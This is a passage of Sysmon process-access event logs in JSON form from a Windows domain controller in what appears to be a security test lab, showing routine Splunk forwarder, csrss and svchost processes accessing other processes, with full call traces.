Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1239-5F25-0000-001033350900}","TargetProcessId":"4768","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6352,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1239-5F25-0000-001033350900}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1239-5F25-0000-001033350900}","TargetProcessId":"4768","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6353,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6354,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:57.276","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:57.276\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 